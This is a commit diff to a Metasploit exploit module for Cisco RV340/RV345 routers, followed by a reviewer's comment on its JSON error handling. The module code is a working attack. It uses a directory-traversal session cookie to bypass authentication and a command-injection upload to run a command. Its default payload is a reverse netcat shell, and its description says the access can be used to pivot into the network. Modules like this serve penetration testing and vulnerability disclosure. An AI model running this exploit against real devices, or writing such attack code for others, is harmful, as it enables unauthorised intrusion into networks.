Update description and vulnerability listings. Clean up references. Add more randomization. Remove the first unnecessary request in the exploit portion of the code. Add a rescue section around JSON parsing.
parent
427c181e9a
commit
4b05ba6189
|
@ -17,29 +17,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
info,
|
||||
'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a sessionid directory traversal authentication bypass, a sessionid
|
||||
improper input validation authentication bypass, and command injection on Cisco RV340 and
|
||||
RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
|
||||
at Sea Security.
|
||||
|
||||
This module works on firmware versions 1.0.03.24 and below
|
||||
This module exploits two vulnerabilities, a session ID directory traversal authentication
|
||||
bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
|
||||
Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
|
||||
This access can then be used to pivot to other parts of the network. This module works on firmware
|
||||
versions 1.0.03.24 and below.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['Linux', 'Unix'],
|
||||
'Author' => [
|
||||
'Biem Pham', # Vulnerability Discoveries
|
||||
'Neterum', # Metasploit Module
|
||||
'jbaines-r7' # This metasploit module is heavily inspired from
|
||||
# cisco_rv_series_authbypass_and_rce.rb
|
||||
'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb
|
||||
],
|
||||
'DisclosureDate' => '2021-11-02',
|
||||
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
||||
'References' => [
|
||||
[ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
|
||||
[ 'CVE', '2022-20705'], # Authentication Bypass
|
||||
[ 'CVE', '2022-20707'], # Command Injection
|
||||
[ 'ZDI', '22-409'], # Authentication Bypass
|
||||
[ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
|
||||
[ 'ZDI', '22-410'], # Authentication Bypass
|
||||
[ 'ZDI', '22-411'] # Command Injection
|
||||
],
|
||||
'Targets' => [
|
||||
|
@ -51,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Type' => :unix_cmd,
|
||||
'Payload' => {},
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat'
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat',
|
||||
'BadChars' => '\''
|
||||
}
|
||||
}
|
||||
],
|
||||
|
@ -110,26 +107,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
if target['Type'] != :unix_cmd
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||
body_json = res.get_json_document
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
|
||||
begin
|
||||
body_json = res.get_json_document
|
||||
fail_with(Failure::NotFound, 'The target did not respond with a JSON body') unless body_json
|
||||
rescue JSON::ParserError => e
|
||||
print_error("Failed: #{e.class} - #{e.message}")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
print_good('Exploit successfully executed.')
|
||||
end
|
||||
|
||||
def send_exploit(cmd)
|
||||
user = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
pass = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
filename = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
fileparam = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
input = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
|
||||
send_request_cgi({
|
||||
'encode_params' => false,
|
||||
'method' => 'POST',
|
||||
'uri' => '/jsonrpc',
|
||||
'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
|
||||
})
|
||||
# sessionid utilized later needs to be set to length
|
||||
# of 16 or exploit will fail. Tested with lengths
|
||||
# 14-17
|
||||
sessionid = Rex::Text.rand_text_alphanumeric(16)
|
||||
|
||||
filepath = '/tmp/upload.input'
|
||||
pathparam = 'Configuration'
|
||||
|
@ -149,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => '/upload',
|
||||
'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
|
||||
'headers' => {
|
||||
'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
|
||||
'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
|
||||
},
|
||||
'data' => multipart_form.to_s
|
||||
}, 10)
|
||||
|
|
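Review bot: The `rescue JSON::ParserError` added in the `exploit` hunk reports the problem with `print_error` and `return nil`, so a malformed reply ends the run without the framework recording a failure; a module should raise through `fail_with` instead, e.g. `rescue JSON::ParserError => e` followed by `fail_with(Failure::UnexpectedReply, "The target did not respond with a parseable JSON body: #{e.message}")`. The switch to `Failure::NotFound` on the `unless body_json` line is also a misclassification for a 200 response that lacks a JSON body; the previous `Failure::UnexpectedReply` describes that case better. If `get_json_document` already swallows parse errors and returns an empty hash, as I believe the Rex implementation does, neither the rescue nor the nil guard will ever fire and the check would need to be `body_json.empty?` — worth confirming against Rex::Proto::Http::Response before relying on either. The `exploit` method this belongs to begins before the hunk, and `send_exploit` continues past it.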